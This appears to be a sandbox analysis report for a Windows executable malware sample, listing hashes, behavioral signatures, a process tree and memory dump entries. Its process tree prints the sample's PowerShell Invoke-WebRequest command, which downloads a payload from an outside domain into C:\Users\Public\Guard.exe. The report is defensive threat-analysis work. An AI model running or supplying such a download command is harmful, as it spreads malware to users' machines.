Overview

overview

8

Static

static

5

510e2f0999...ce.exe

windows7-x64

8

510e2f0999...ce.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    15s
  • max time network
    19s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    21-11-2024 10:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe

  • Size

    1.0MB

  • MD5

    4b3b813bb2357edd39d710c708ff1223

  • SHA1

    beec5f0c7fe9fe6c3f6e7de7c77ccecc06199e82

  • SHA256

    510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece

  • SHA512

    55f5ff5d974ac0aa9463fa6019e57e7600648d6cc614a28df75b771491c902d64491d5682e559c0fe893e382fe8673dec15da57d46968b172026067ccfb0d1f9

  • SSDEEP

    24576:UrORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9Tva14p8:U2EYTb8atv1orq+pEiSDTj1VyvBa17

Score
8/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

    execution
  • Drops file in System32 directory 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe
    "C:\Users\Admin\AppData\Local\Temp\510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe"
    1⤵
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2660
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri "https://gotexindigos.com/dpunk/dpunk" -OutFile "C:\Users\Public\Guard.exe""
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2124

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2124-4-0x000007FEF610E000-0x000007FEF610F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2124-5-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2124-6-0x000000001B120000-0x000000001B402000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2124-7-0x00000000026A0000-0x00000000026A8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2124-8-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2124-9-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2124-10-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

    Filesize

    9.6MB

    Download